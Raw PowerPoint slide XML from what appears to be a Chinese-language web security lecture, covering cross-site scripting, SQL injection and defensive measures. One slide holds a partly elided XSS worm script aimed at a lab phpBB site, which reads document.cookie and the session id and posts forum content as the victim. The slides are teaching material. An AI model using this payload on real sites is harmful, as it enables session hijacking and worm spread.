            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  Ajax=null;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>//  Construct  the  header  information  for  the  Http  request</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ajax=new  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Ajax.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>POST","http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>www.xsslabphpbb.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/posting.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>",true);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ajax.setRequestHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“Cookie”,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>//get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> from the cookie</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>str_sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = ......;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>//Construct the content. The format of the content can be learned from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>LiveHttpHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>. All we need to fill is subject, message, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, for a true XSS worm, we need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>intgrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> codes into message.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> content="subject="  +  "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>XSSWorm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>"  + ”……&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>message=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>&amp;topictype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>=0&amp;poll_title=&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>add_poll_option_text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>=&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>poll_length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>=&amp;mode=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>newtopic&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>str_sid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>"&amp;f=1&amp;post=Submit"; </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>//Send the HTTP POST request.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ajax.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(content);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2583843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7"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A35AFCB2-AB04-DD43-8351-15B1F67390E5}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5529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5433D75E-1D57-B041-B8A1-51B9F038FDA5}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55300" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1691680" y="188640"/>
            <a:ext cx="8001000" cy="675928"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>跨站脚本攻击防范措施</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55301" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器端防范措施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“限制、拒绝、净化”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>输入验证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>对用户提交数据进行尽可能严格的验证与过滤 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>输出净化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>HTMLEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>消除危险的输入点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>客户端防范措施</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>提高浏览器访问非受信网站时的安全等级</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>功能，或设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>只读</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(IE6SP1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>HTTPonly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> cookie)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>安全意识和浏览习惯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>非主流浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Chrome, Safari, Opera</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3117828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8238316F-A6DD-3A46-A753-AFCBD2390670}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419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C500AB0B-015C-DD48-BF21-968C74104B72}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41988" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1691680" y="260648"/>
            <a:ext cx="8001000" cy="603920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注入攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> (SQL Injection)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41989" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注入攻击对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>应用程序的威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>相当大部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>应用程序使用后台数据库，动态产生内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注入攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>应用程序数据层存在的输入验证不完善型安全漏洞实施的一类代码注入攻击技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注入漏洞机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用户输入没有被正确地过滤：转义字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>引号、反引号、双下划线、分号、百分号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>没有进行严格类型检查：未判断输入是否预定类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135551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332656"/>
            <a:ext cx="8001000" cy="459904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
